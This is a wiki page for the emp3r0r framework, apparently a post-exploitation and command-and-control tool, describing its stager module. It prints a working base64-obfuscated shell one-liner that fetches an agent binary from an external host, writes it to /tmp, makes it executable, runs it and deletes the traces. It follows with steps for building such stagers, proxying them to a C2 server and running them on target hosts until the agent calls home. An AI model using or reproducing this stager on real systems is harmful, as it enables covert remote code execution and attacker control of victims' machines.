Skip to content

Stager

Jump to bottom Edit New page
jm33-m0 edited this page Oct 22, 2024 · 3 revisions

Intro

A stager can be a shell command one-liner or a small piece of script code that can be easily executed on a target host. Once it runs, an (obfuscated) agent binary is downloaded and started.

For Linux hosts, a common type of stager looks like this:

echo 'ZCgpIHsKd2dldCAtcSAiJDEiIC1PLXx8Y3VybCAtZmtzTCAiJDEifHxweXRob24gLWMgImltcG9ydCB1cmxsaWI7dT11cmxsaWIudXJsb3BlbignJHsxfScpO3ByaW50KHUucmVhZCgpKTsifHxweXRob24gLWMgImltcG9ydCB1cmxsaWIucmVxdWVzdDtpbXBvcnQgc3lzO3U9dXJsbGliLnJlcXVlc3QudXJsb3BlbignJDEnKTtzeXMuc3Rkb3V0LmJ1ZmZlci53cml0ZSh1LnJlYWQoKSk7Inx8cGVybCAtZSAidXNlIExXUDo6U2ltcGxlO1wkcmVzcD1nZXQoXCIkezF9XCIpO3ByaW50KFwkcmVzcCk7Igp9CmQgJ2h0dHA6Ly9lbXAzcjByLmptMzMtbmcuY29tOjI1MDQyJz4vdG1wL1p1JiZiYXNlNjQgLWQgPC90bXAvWnU+L3RtcC9adWtXU0VmSlVwR3NBbG5aeE9qQ0lmCmNobW9kICt4IC90bXAvWnVrV1NFZkpVcEdzQWxuWnhPakNJZgovdG1wL1p1a1dTRWZKVXBHc0Fsblp4T2pDSWYKcm0gLWYgL3RtcC9adSo=' | base64 -d | sh

How to Use It

  1. In the emp3r0r console, type use gen_agent to build your desired agent binary.

  2. Once the agent is generated, type use stager to enter the stager module. You will be prompted to select a type. Currently, I recommend using bash.

  3. Here are a few important notes:

    • The stager needs a URL to download the obfuscated agent binary, which is already being served on a random HTTP port.
    • You can create a URL, such as http://some_domain.com/some_path, that should reverse-proxy to http://c2_host:port. When this URL is requested, the agent binary will be returned.

  4. Run the generated shell command or other types of stager on the target host, and wait for the agent to call home.

Add a custom footer
Add a custom sidebar
Clone this wiki locally